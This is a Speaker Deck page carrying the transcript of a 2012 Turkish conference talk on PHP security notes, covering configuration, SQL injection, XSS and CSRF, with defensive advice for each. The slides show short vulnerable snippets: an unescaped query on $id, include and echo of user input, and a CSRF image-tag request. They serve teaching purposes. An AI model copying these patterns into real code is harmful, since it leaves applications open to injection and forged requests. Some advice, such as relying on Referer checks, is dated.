Upgrade to Pro
— share decks privately, control downloads, hide ads and more …
Speaker Deck
Features
Speaker Deck
PRO
Sign in
Sign up for free
Search
Search
PHP Güvenlik Notları
Search
Hidayet Doğan
November 07, 2012
Programming
1.3k
0
Share
PHP Güvenlik Notları
XVII. Türkiye'de İnternet Konferansı - Anadolu Üniversitesi, Eskişehir
Hidayet Doğan
November 07, 2012
More Decks by Hidayet Doğan
See All by Hidayet Doğan
Swoole ile Asenkron PHP
hdogan
0
810
Asenkron PHP
hdogan
0
1.6k
PHP Senfoni Orkestrası: Composer
hdogan
1
450
PHP ile Soket Programlama ve Ağ Servisleri
hdogan
5
4.4k
CakePHP ile Pasta Pişirmek
hdogan
1
900
PHP 101
hdogan
1
760
Web Uygulamalarında Güvenlik
hdogan
1
520
Phalcon - Eklenti olarak sunulan PHP çatısı - PHP Günleri 2013#1
hdogan
5
1.7k
İnsanlar için PHP
hdogan
0
570
Other Decks in Programming
See All in Programming
仕様漏れ実装漏れをなくすトレーサビリティAI基盤のご紹介
orgachem
PRO
8
4.8k
AI時代のPhpStorm最新事情 #phpcon_odawara
yusuke
0
110
iOS機能開発のAI環境と起きた変化
ryunakayama
0
160
メッセージングを利用して時間的結合を分離しよう #phperkaigi
kajitack
3
560
Smarter Angular mit Transformers.js & Prompt API
christianliebel
PRO
1
120
ネイティブアプリとWebフロントエンドのAPI通信ラッパーにおける共通化の勘所
suguruooki
0
250
forteeの改修から振り返るPHPerKaigi 2026
muno92
PRO
3
240
見せてもらおうか、 OpenSearchの性能とやらを!
shunta27
1
180
The Monolith Strikes Back: Why AI Agents ❤️ Rails Monoliths
serradura
0
220
Java 21/25 Virtual Threads 소개
debop
0
330
The free-lunch guide to idea circularity
hollycummins
0
420
一度始めたらやめられない開発効率向上術 / Findy あなたのdotfilesを教えて!
k0kubun
4
2.8k
Featured
See All Featured
GraphQLとの向き合い方2022年版
quramy
50
14k
Efficient Content Optimization with Google Search Console & Apps Script
katarinadahlin
PRO
1
470
Kristin Tynski - Automating Marketing Tasks With AI
techseoconnect
PRO
0
210
Designing Powerful Visuals for Engaging Learning
tmiket
1
330
How to Ace a Technical Interview
jacobian
281
24k
SERP Conf. Vienna - Web Accessibility: Optimizing for Inclusivity and SEO
sarafernandez
2
1.4k
VelocityConf: Rendering Performance Case Studies
addyosmani
333
25k
Visualizing Your Data: Incorporating Mongo into Loggly Infrastructure
mongodb
49
9.9k
[RailsConf 2023 Opening Keynote] The Magic of Rails
eileencodes
31
10k
Embracing the Ebb and Flow
colly
88
5k
Accessibility Awareness
sabderemane
0
94
Technical Leadership for Architectural Decision Making
baasie
3
310
Transcript
PHP Güvenlik Notları Friday, November 9, 12
PHP Güvenlik Notları Kod Okunurluğu PHP Ayarları SQL Injection Cross-site
Scripting (XSS) Cross-site Request Forgery (CSRF) Friday, November 9, 12
Kod Okunurluğu Friday, November 9, 12
PHP Ayarları Her zaman: register_globals = Off allow_url_include, allow_url_fopen error_reporting,
display_errors, log_errors Friday, November 9, 12
SQL Injection SELECT * FROM tablo WHERE id = $id
register_globals = Off mysql_real_escape_string, pg_escape_string, PDO filter_input, filter_var Typecasting (integer) (boolean) (double) (float) addslashes = Yeterli değil! Friday, November 9, 12
Cross-site Scripting (XSS) include($dosya); echo $kullanicidan_gelen_veri; register_globals = Off allow_url_include
= Off basename, realpath, preg_match htmlspecialchars, htmlentities, strip_tags Friday, November 9, 12
Cross-site Request Forgery (CSRF) <img src=”http://adres.com/gonder.php?yorum=Örnek”> Oturum bazlı doğrulayıcı anahtarlar
(token) $_SERVER[‘HTTP_REFERER’] kontrol Ajax: $_SERVER[‘HTTP_X_REQUESTED_WITH’] kontrol Friday, November 9, 12
Sorular? Friday, November 9, 12
PHP ve Web Güvenliği ezber kartları! Friday, November 9, 12
Teşekkürler! http://php.net/manual/tr/security.php http://shiflett.org/php-security.pdf http://hi.do http://github.com/hdogan Twitter @hdogan Friday, November 9,
12
hdogan
orgachem
yusuke
ryunakayama
kajitack
christianliebel
suguruooki
muno92
shunta27
serradura
debop
hollycummins
k0kubun
quramy
katarinadahlin
techseoconnect
tmiket
jacobian
sarafernandez
addyosmani
mongodb
eileencodes
colly
sabderemane
baasie
